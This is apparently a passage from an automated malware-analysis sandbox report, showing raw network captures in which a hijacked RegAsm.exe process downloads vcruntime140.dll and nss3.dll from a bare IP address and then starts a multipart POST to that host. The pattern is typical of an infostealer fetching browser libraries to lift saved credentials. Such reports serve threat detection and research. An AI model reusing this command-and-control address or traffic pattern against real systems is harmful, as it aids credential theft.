                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                      Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                      Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                      Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      15192.168.2.64973649.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:29 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:29 UTC261INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:29 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 80880
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:29 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:29 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                      2024-10-03 07:16:29 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                      Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                      2024-10-03 07:16:30 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                      Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                      2024-10-03 07:16:30 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                      Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                      2024-10-03 07:16:30 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                      Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      16192.168.2.64973749.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:30 UTC192OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:31 UTC263INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:31 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:31 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:31 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                      Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                      Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                      Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                      Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                      Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                      Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                      Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                      Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                      2024-10-03 07:16:31 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                      Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      17192.168.2.64973849.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:33 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
